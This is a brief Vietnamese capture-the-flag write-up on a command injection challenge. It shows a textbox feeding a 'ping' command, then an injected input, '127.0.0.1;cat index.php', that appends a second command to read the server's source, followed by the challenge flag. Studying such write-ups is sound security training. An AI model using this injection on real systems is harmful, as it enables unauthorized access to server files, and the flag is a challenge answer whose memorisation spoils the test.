# Command injection

Khi ta nhập @abc gì đó vào textbox, server sẽ chạy lệnh sau trên terminal:

`ping @abc`

Ta nhập `127.0.0.1;cat index.php` , server chạy lệnh `ping 127.0.0.1; cat index.php`

Ctrl + U ta có:

Flag

---

### Flag:

`S3rv1ceP1n9Sup3rS3cure`